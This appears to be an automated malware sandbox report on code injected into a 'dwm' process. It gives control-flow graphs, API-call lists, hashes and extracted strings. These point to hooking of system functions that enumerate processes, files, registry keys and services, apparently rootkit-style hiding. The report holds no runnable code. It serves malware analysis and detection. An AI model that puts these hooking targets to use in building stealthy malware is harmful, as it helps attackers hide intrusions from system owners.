                                                                                                      control_flow_graph 51 2311e405c10-2311e405c37 52 2311e405c39-2311e405c48 51->52 53 2311e405c4b-2311e405c56 GetCurrentThreadId 51->53 52->53 54 2311e405c62-2311e405c69 53->54 55 2311e405c58-2311e405c5d 53->55 57 2311e405c7b-2311e405c8f 54->57 58 2311e405c6b-2311e405c76 call 2311e405a40 54->58 56 2311e40608f-2311e4060a6 call 2311e407a20 55->56 61 2311e405c9e-2311e405ca4 57->61 58->56 64 2311e405d75-2311e405d96 61->64 65 2311e405caa-2311e405cb3 61->65 71 2311e405d9c-2311e405dbc GetThreadContext 64->71 72 2311e405eff-2311e405f10 call 2311e40759f 64->72 66 2311e405cb5-2311e405cf8 call 2311e4086a0 65->66 67 2311e405cfa-2311e405d6d call 2311e4045f0 call 2311e404590 call 2311e404550 65->67 79 2311e405d70 66->79 67->79 76 2311e405dc2-2311e405de3 71->76 77 2311e405efa 71->77 83 2311e405f15-2311e405f1b 72->83 76->77 82 2311e405de9-2311e405df2 76->82 77->72 79->61 86 2311e405e72-2311e405e83 82->86 87 2311e405df4-2311e405e05 82->87 88 2311e405f21-2311e405f78 VirtualProtect FlushInstructionCache 83->88 89 2311e405fde-2311e405fee 83->89 95 2311e405ef5 86->95 96 2311e405e85-2311e405ea3 86->96 91 2311e405e07-2311e405e1c 87->91 92 2311e405e6d 87->92 93 2311e405fa9-2311e405fd9 call 2311e40798c 88->93 94 2311e405f7a-2311e405f84 88->94 98 2311e405ffe-2311e40600a call 2311e404ed0 89->98 99 2311e405ff0-2311e405ff7 89->99 91->92 101 2311e405e1e-2311e405e68 call 2311e403a50 SetThreadContext 91->101 92->95 93->83 94->93 102 2311e405f86-2311e405fa1 call 2311e404470 94->102 96->95 103 2311e405ea5-2311e405ef0 call 2311e4039e0 call 2311e4075bd 96->103 112 2311e40600f-2311e406015 98->112 99->98 105 2311e405ff9 call 2311e4044c0 99->105 101->92 102->93 103->95 105->98 116 2311e406057-2311e406075 112->116 117 2311e406017-2311e406055 ResumeThread call 2311e40798c 112->117 120 2311e406077-2311e406086 116->120 121 2311e406089 116->121 117->112 120->121 121->56
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$Current$Context
                                                                                                      • String ID:
                                                                                                      • API String ID: 1666949209-0
                                                                                                      • Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
                                                                                                      • Instruction ID: 64ae611a4921262f5263e1d10b2c741a634708e72a66558dddc3f4bb6321254c
                                                                                                      • Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
                                                                                                      • Instruction Fuzzy Hash: 7CD19A76208B8885DA70DB59E49839A7BA0F788F84F100126EBCD87FA5DF7CC651DB50

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 1092925422-0
                                                                                                      • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction ID: 4b975b153568da779795242322487298ba959dd63a5a8062f828e0d535dbc4cd
                                                                                                      • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction Fuzzy Hash: 84112A3A704B4082EF149B91F4082AA6BA0F748F84F050039DFCD87B94EE7DD614D710

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 129 2311e4051b0-2311e4051dc 130 2311e4051ed-2311e4051f6 129->130 131 2311e4051de-2311e4051e6 129->131 132 2311e405207-2311e405210 130->132 133 2311e4051f8-2311e405200 130->133 131->130 134 2311e405221-2311e40522a 132->134 135 2311e405212-2311e40521a 132->135 133->132 136 2311e405236-2311e405241 GetCurrentThreadId 134->136 137 2311e40522c-2311e405231 134->137 135->134 139 2311e405243-2311e405248 136->139 140 2311e40524d-2311e405254 136->140 138 2311e4057b3-2311e4057ba 137->138 139->138 141 2311e405261-2311e40526a 140->141 142 2311e405256-2311e40525c 140->142 143 2311e405276-2311e405282 141->143 144 2311e40526c-2311e405271 141->144 142->138 145 2311e405284-2311e4052a9 143->145 146 2311e4052ae-2311e405305 call 2311e4057c0 * 2 143->146 144->138 145->138 151 2311e405307-2311e40530e 146->151 152 2311e40531a-2311e405323 146->152 153 2311e405316 151->153 154 2311e405310 151->154 155 2311e405335-2311e40533e 152->155 156 2311e405325-2311e405332 152->156 153->152 158 2311e405386-2311e40538a 153->158 157 2311e405390-2311e405396 154->157 159 2311e405353-2311e405378 call 2311e407950 155->159 160 2311e405340-2311e405350 155->160 156->155 161 2311e4053c5-2311e4053cb 157->161 162 2311e405398-2311e4053b4 call 2311e404470 157->162 158->157 169 2311e40540d-2311e405422 call 2311e403da0 159->169 170 2311e40537e 159->170 160->159 166 2311e4053f5-2311e405408 161->166 167 2311e4053cd-2311e4053ec call 2311e40798c 161->167 162->161 172 2311e4053b6-2311e4053be 162->172 166->138 167->166 176 2311e405431-2311e40543a 169->176 177 2311e405424-2311e40542c 169->177 170->158 172->161 178 2311e40544c-2311e40549a call 2311e408d50 176->178 179 2311e40543c-2311e405449 176->179 177->158 182 2311e4054a2-2311e4054aa 178->182 179->178 183 2311e4055b7-2311e4055bf 182->183 184 2311e4054b0-2311e40559b call 2311e407520 182->184 185 2311e4055c1-2311e4055d4 call 2311e404670 183->185 186 2311e405603-2311e40560b 183->186 194 2311e40559d 184->194 195 2311e40559f-2311e4055ae call 2311e404140 184->195 199 2311e4055d6 185->199 200 2311e4055d8-2311e405601 185->200 190 2311e405617-2311e405626 186->190 191 2311e40560d-2311e405615 186->191 192 2311e405628 190->192 193 2311e40562f 190->193 191->190 197 2311e405634-2311e405641 191->197 192->193 193->197 194->183 205 2311e4055b2 195->205 206 2311e4055b0 195->206 201 2311e405643 197->201 202 2311e405644-2311e405699 call 2311e4086a0 197->202 199->186 200->183 201->202 208 2311e4056a8-2311e405741 call 2311e4045f0 call 2311e404550 VirtualProtect 202->208 209 2311e40569b-2311e4056a3 202->209 205->182 206->183 214 2311e405751-2311e4057b1 208->214 215 2311e405743-2311e405748 GetLastError 208->215 214->138 215->214
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2882836952-0
                                                                                                      • Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
                                                                                                      • Instruction ID: 9332118a008d7569771034cac7ba51eb92c084066515269ece57c1523346b284
                                                                                                      • Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
                                                                                                      • Instruction Fuzzy Hash: C102BB36219B8086E760DB95E49439ABBA0F3C4B94F104125EBCE87FA8DFBCC554DB50

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 31662377-0
                                                                                                      • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                                                      • Instruction ID: 0cdf8ce9afc29be012f47d7741a52d889a3768b2fde010593ac44c7d33a2c63b
                                                                                                      • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                                                      • Instruction Fuzzy Hash: AD31BF31219A4481EA70DA95E4583DB6FA4F388B88F100535A7CD86F99DFBDC7A09B14

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                      • String ID:
                                                                                                      • API String ID: 1683269324-0
                                                                                                      • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                      • Instruction ID: db7b6419cb2e85fe0d2eec0f47b6c55b443f253ed02242e24e53d1e6ee5fe43d
                                                                                                      • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                      • Instruction Fuzzy Hash: F111793071060182FB2197A2A90E7DA2F90A744F14F440038ABCEC9994EFFCE264A230

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3733156554-0
                                                                                                      • Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
                                                                                                      • Instruction ID: 0d14c7ba0fdd593e31395c8c55a107d0f4cc00ff13625c4c7b27d2bfaebd7dcd
                                                                                                      • Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
                                                                                                      • Instruction Fuzzy Hash: 3BF0BD76218A4481D630EB85E4597CA6BA0E388BD4F144125BACD87F69DE7CC7A09B10

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 000002311E401650: GetProcessHeap.KERNEL32 ref: 000002311E40165B
                                                                                                        • Part of subcall function 000002311E401650: HeapAlloc.KERNEL32 ref: 000002311E40166A
                                                                                                        • Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E4016DA
                                                                                                        • Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E401707
                                                                                                        • Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E401721
                                                                                                        • Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E401741
                                                                                                        • Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E40175C
                                                                                                        • Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E40177C
                                                                                                        • Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E401797
                                                                                                        • Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E4017B7
                                                                                                        • Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E4017D2
                                                                                                        • Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E4017F2
                                                                                                      • Sleep.KERNEL32 ref: 000002311E401C43
                                                                                                      • SleepEx.KERNELBASE ref: 000002311E401C49
                                                                                                        • Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E40180D
                                                                                                        • Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E40182D
                                                                                                        • Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E401848
                                                                                                        • Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E401868
                                                                                                        • Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E401883
                                                                                                        • Part of subcall function 000002311E401650: RegOpenKeyExW.ADVAPI32 ref: 000002311E4018A3
                                                                                                        • Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E4018BE
                                                                                                        • Part of subcall function 000002311E401650: RegCloseKey.ADVAPI32 ref: 000002311E4018C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1534210851-0
                                                                                                      • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                      • Instruction ID: 96104da9dbf93974a69303edefa94b2bc70598b286cf9c6aad2029f578bf7f00
                                                                                                      • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                      • Instruction Fuzzy Hash: A431CC3530060191FB519BA6E9493DA1AE5AB44FC0F045431EFCDC7FD6EEA8EA71A270

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 302 2311e3d2908-2311e3d2973 call 2311e3d0f34 * 4 311 2311e3d2979-2311e3d297c 302->311 312 2311e3d2b8b 302->312 311->312 313 2311e3d2982-2311e3d2985 311->313 314 2311e3d2b8d-2311e3d2ba9 312->314 313->312 315 2311e3d298b-2311e3d298e 313->315 315->312 316 2311e3d2994-2311e3d29b2 VirtualAlloc 315->316 316->312 317 2311e3d29b8-2311e3d29dc call 2311e3d0d6c 316->317 320 2311e3d29de-2311e3d2a09 call 2311e3d0d6c 317->320 321 2311e3d2a0b-2311e3d2a12 317->321 320->321 323 2311e3d2a18-2311e3d2a25 321->323 324 2311e3d2ab2-2311e3d2ab9 321->324 323->324 328 2311e3d2a2b-2311e3d2a39 323->328 326 2311e3d2abf-2311e3d2ad6 324->326 327 2311e3d2b6c-2311e3d2b89 324->327 326->327 329 2311e3d2adc 326->329 327->314 335 2311e3d2a9d-2311e3d2aa5 328->335 336 2311e3d2a3b-2311e3d2a45 328->336 331 2311e3d2ae2-2311e3d2af7 329->331 333 2311e3d2af9-2311e3d2b0a 331->333 334 2311e3d2b5b-2311e3d2b66 331->334 339 2311e3d2b0c-2311e3d2b13 333->339 340 2311e3d2b15-2311e3d2b19 333->340 334->327 334->331 335->328 337 2311e3d2aa7-2311e3d2aac 335->337 341 2311e3d2a48-2311e3d2a4c 336->341 337->324 344 2311e3d2b48-2311e3d2b59 339->344 345 2311e3d2b1b-2311e3d2b22 340->345 346 2311e3d2b24-2311e3d2b28 340->346 342 2311e3d2a4e-2311e3d2a52 341->342 343 2311e3d2a9a 341->343 347 2311e3d2a7d-2311e3d2a87 342->347 348 2311e3d2a54-2311e3d2a7b 342->348 343->335 344->333 344->334 345->344 349 2311e3d2b3a-2311e3d2b3e 346->349 350 2311e3d2b2a-2311e3d2b38 346->350 351 2311e3d2a8d-2311e3d2a98 347->351 348->351 349->344 352 2311e3d2b40-2311e3d2b43 349->352 350->344 351->341 352->344
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893803186.000002311E3D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E3D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e3d0000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction ID: 56cfb7e99d97c3f2bad38467cd5cb5a8c5422388c8e0f790564bc0e88b7ddf38
                                                                                                      • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction Fuzzy Hash: 1E61453272165083EB68CFA5D4447ADB395FB04FA4F949011DB9D07784DBBEDA62C720

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 353 2311e432908-2311e432973 call 2311e430f34 * 4 362 2311e432b8b 353->362 363 2311e432979-2311e43297c 353->363 365 2311e432b8d-2311e432ba9 362->365 363->362 364 2311e432982-2311e432985 363->364 364->362 366 2311e43298b-2311e43298e 364->366 366->362 367 2311e432994-2311e4329b2 VirtualAlloc 366->367 367->362 368 2311e4329b8-2311e4329dc call 2311e430d6c 367->368 371 2311e432a0b-2311e432a12 368->371 372 2311e4329de-2311e432a09 call 2311e430d6c 368->372 374 2311e432ab2-2311e432ab9 371->374 375 2311e432a18-2311e432a25 371->375 372->371 377 2311e432b6c-2311e432b89 374->377 378 2311e432abf-2311e432ad6 374->378 375->374 379 2311e432a2b-2311e432a39 375->379 377->365 378->377 380 2311e432adc 378->380 386 2311e432a3b-2311e432a45 379->386 387 2311e432a9d-2311e432aa5 379->387 382 2311e432ae2-2311e432af7 380->382 384 2311e432b5b-2311e432b66 382->384 385 2311e432af9-2311e432b0a 382->385 384->377 384->382 391 2311e432b15-2311e432b19 385->391 392 2311e432b0c-2311e432b13 385->392 388 2311e432a48-2311e432a4c 386->388 387->379 389 2311e432aa7-2311e432aac 387->389 395 2311e432a9a 388->395 396 2311e432a4e-2311e432a52 388->396 389->374 393 2311e432b24-2311e432b28 391->393 394 2311e432b1b-2311e432b22 391->394 397 2311e432b48-2311e432b59 392->397 398 2311e432b3a-2311e432b3e 393->398 399 2311e432b2a-2311e432b38 393->399 394->397 395->387 400 2311e432a54-2311e432a7b 396->400 401 2311e432a7d-2311e432a87 396->401 397->384 397->385 398->397 403 2311e432b40-2311e432b43 398->403 399->397 402 2311e432a8d-2311e432a98 400->402 401->402 402->388 403->397
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12894078896.000002311E430000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002311E430000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e430000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction ID: c442ebf0386bea5e17d313f54559d349e12ee33d9836c68515ff57e5528e0d32
                                                                                                      • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction Fuzzy Hash: 2F61413230966083EA68CF95D4487ADB395FB04F94F148121DB9D87F84DB7CEA62D728

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 467 2311e402cdc-2311e402d55 call 2311e41ecc0 470 2311e402d5b-2311e402d61 467->470 471 2311e403090-2311e4030b3 467->471 470->471 472 2311e402d67-2311e402d6a 470->472 472->471 473 2311e402d70-2311e402d73 472->473 473->471 474 2311e402d79-2311e402d89 GetModuleHandleA 473->474 475 2311e402d8b-2311e402d9b GetProcAddress 474->475 476 2311e402d9d 474->476 477 2311e402da0-2311e402dbe 475->477 476->477 477->471 479 2311e402dc4-2311e402de3 StrCmpNIW 477->479 479->471 480 2311e402de9-2311e402ded 479->480 480->471 481 2311e402df3-2311e402dfd 480->481 481->471 482 2311e402e03-2311e402e0a 481->482 482->471 483 2311e402e10-2311e402e23 482->483 484 2311e402e33 483->484 485 2311e402e25-2311e402e31 483->485 486 2311e402e36-2311e402e3a 484->486 485->486 487 2311e402e4a 486->487 488 2311e402e3c-2311e402e48 486->488 489 2311e402e4d-2311e402e57 487->489 488->489 490 2311e402f4d-2311e402f51 489->490 491 2311e402e5d-2311e402e60 489->491 492 2311e403082-2311e40308a 490->492 493 2311e402f57-2311e402f5a 490->493 494 2311e402e72-2311e402e7c 491->494 495 2311e402e62-2311e402e6f call 2311e401a14 491->495 492->471 492->483 496 2311e402f6b-2311e402f75 493->496 497 2311e402f5c-2311e402f68 call 2311e401a14 493->497 499 2311e402e7e-2311e402e8b 494->499 500 2311e402eb0-2311e402eba 494->500 495->494 504 2311e402fa5-2311e402fa8 496->504 505 2311e402f77-2311e402f84 496->505 497->496 499->500 507 2311e402e8d-2311e402e9a 499->507 501 2311e402eea-2311e402eed 500->501 502 2311e402ebc-2311e402ec9 500->502 510 2311e402efb-2311e402f08 lstrlenW 501->510 511 2311e402eef-2311e402ef9 call 2311e401d28 501->511 502->501 509 2311e402ecb-2311e402ed8 502->509 514 2311e402fb5-2311e402fc2 lstrlenW 504->514 515 2311e402faa-2311e402fb3 call 2311e401d28 504->515 505->504 513 2311e402f86-2311e402f93 505->513 508 2311e402e9d-2311e402ea3 507->508 517 2311e402f43-2311e402f48 508->517 518 2311e402ea9-2311e402eae 508->518 521 2311e402edb-2311e402ee1 509->521 523 2311e402f0a-2311e402f14 510->523 524 2311e402f2b-2311e402f3d call 2311e403930 510->524 511->510 511->517 525 2311e402f96-2311e402f9c 513->525 519 2311e402fc4-2311e402fce 514->519 520 2311e402fe5-2311e402fef call 2311e403930 514->520 515->514 534 2311e402ffa-2311e403005 515->534 528 2311e402ff2-2311e402ff4 517->528 518->500 518->508 519->520 529 2311e402fd0-2311e402fe3 call 2311e401554 519->529 520->528 521->517 530 2311e402ee3-2311e402ee8 521->530 523->524 533 2311e402f16-2311e402f29 call 2311e401554 523->533 524->517 524->528 525->534 535 2311e402f9e-2311e402fa3 525->535 528->492 528->534 529->520 529->534 530->501 530->521 533->517 533->524 539 2311e403007-2311e40300b 534->539 540 2311e40307c-2311e403080 534->540 535->504 535->525 543 2311e403013-2311e40302d call 2311e4086a0 539->543 544 2311e40300d-2311e403011 539->544 540->492 546 2311e403030-2311e403033 543->546 544->543 544->546 549 2311e403035-2311e403053 call 2311e4086a0 546->549 550 2311e403056-2311e403059 546->550 549->550 550->540 552 2311e40305b-2311e403079 call 2311e4086a0 550->552 552->540
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                      • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction ID: ffa012dfacf06c0e0277ad5cc3e3960543eb1ed7403fd1209b85f3ca89f36216
                                                                                                      • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction Fuzzy Hash: D4B1A032211A5081EB648FA5D4487DA6BA4FB44F88F445026EF8D93F95DFBDCE60E360
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction ID: 12e2d05924369c7efa40a4016ee0df7ea50cb11fa791cd560efc2cf45d24bce0
                                                                                                      • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction Fuzzy Hash: EC311A72205B8096EB60DFA0E8487E97764F784B44F44442ADB8D87A98EF78C658D724
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction ID: 940d15617fde96df2004dfbba38bc143d1f4a35a9ee91096b5a3ddcb93d0b9cc
                                                                                                      • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                                                                      • Instruction Fuzzy Hash: 73314C32214F8086EB60DF65E8483DE77A4F788B58F500526EB9D87F94DF78C6658B10
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                      • String ID:
                                                                                                      • API String ID: 1443284424-0
                                                                                                      • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction ID: c847ea2086e2666ca3497c700a05274657f92f3b49a0e5c06f73f2e4e9b60f10
                                                                                                      • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                                                                      • Instruction Fuzzy Hash: 2CE1F232B04A809AEB10CFA4D4883DD7BB1F345B88F144516EF8E97F99DA78D626D710

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                      • String ID: d
                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                      • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction ID: 0c5245eebcc377e824a7865881c30902e1d19b893a8a37759076046afcaee781
                                                                                                      • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                                                                      • Instruction Fuzzy Hash: ED515872204B4492EB14CFA2E5483DABBA1F788F90F058124DB8D87B24DFBCE665D710

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000001D.00000002.12893897954.000002311E400000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002311E400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_29_2_2311e400000_dwm.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                      • API String ID: 4175298099-1975688563
                                                                                                      • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction ID: 8c9cad52cf33e3c0d4c1cfaf5b4717b826cea9d09bc4a2419ffeeb56652d4626
                                                                                                      • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                                                                      • Instruction Fuzzy Hash: AA31C564310906A0EE14EFE4E8596D42771B744F84F804423A78D86DA2AEBCE369F3B4

